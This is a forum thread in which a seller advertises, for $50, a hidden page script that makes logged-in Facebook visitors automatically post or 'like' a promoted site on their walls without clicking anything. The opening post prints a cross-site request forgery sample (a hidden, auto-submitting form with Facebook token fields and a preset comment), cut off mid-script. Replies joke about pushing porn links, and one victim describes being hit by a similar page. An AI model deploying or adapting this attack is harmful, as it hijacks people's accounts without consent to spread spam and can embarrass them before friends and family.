Selling Automatic Facebook Wall Post

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Active Member
I'm going to set up for you a method that allows you to get massive amounts of traffic from Facebook. It's pretty simple, when a visitors visits your site, they will automatically make a wall post on their Facebook account that promotes your website. They don't need to click any buttons or anything, it's all automatic and happens when they load the page.

I'm only going to be setting it up for you, I won't tell you how it's done or the details involved. Even if people do get the code you're using, they won't be able to make one for their own site, it doesn't work like that. With this, you'll get a ton of traffic from Facebook, if you've got Google Adsense on your site, you'll make a lot of money.

I know people will have doubts about the validity of this, if you don't believe me, load the following code whilst logged into Facebook and then look on your wall:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
<html xmlns="">
<div style="display: none;"><form action="" target="_self" id="form" method="post" style="display:none;"><input type="hidden" name="comment" value="It's so awesome!!!"><input type="hidden" name="connect_text" value="0"><input type="hidden" name="edge_type" value="like"><input type="hidden" name="fb_dtsg" value="AQCIgEWD"><input type="hidden" name="href" value=""><input type="hidden" name="lsd" value=""><input type="hidden" name="node_type" value="link"><input type="hidden" name="page_id" value=""><input type="hidden" name="post_form_id" value="7cc4e3689351c4adb46558539be0e953"><input type="hidden" name="post_form_id_source" value="AsyncRequest"><input type="hidden" name="story_fbid" value="0"></div><script>
var ddd = document.getElementById('form');
You can attempt to edit the code above and put your own site url and comment, but it won't work. Even if people get the code, they won't be able to set it up with their own site. Only I can set it up for specific sites for you.

Price: $50 (This is peanuts compared to the money you will make off of Adsense or affiliate offers!)
You can only change the URL, not the actual comment ("It's so awesome!!!"). It's pretty much pointless if you can't personalize it with your own site ("Omg, check out this awesome free porn"), etc.
cyber: It displays that message once the wall post has been successfully made (if you're logged into Facebook).

Check your wall.
Sorry for off-topic post, but

Yes, this shit happened with me before few days, I was watching an half-adult video, one of celeb (not porn star). It was on youtube but I was there after 2 redirection from some another sites.

After few hours I have checked my FB profile, which is used to be always-logged in, & saw that I have liked that content & it was first on there.

Few friends got it, but thank god that it wasnt caught by family members.
I hate that type of sites, its like unauthorized thing, something that happens like cookie stuffing. :|

it will get tons of click, good luck selling em.
That's strange, I tried a couple times and I always got an error Lifetalk.

Anyway, just edit the code and use it on your site. Have fun.

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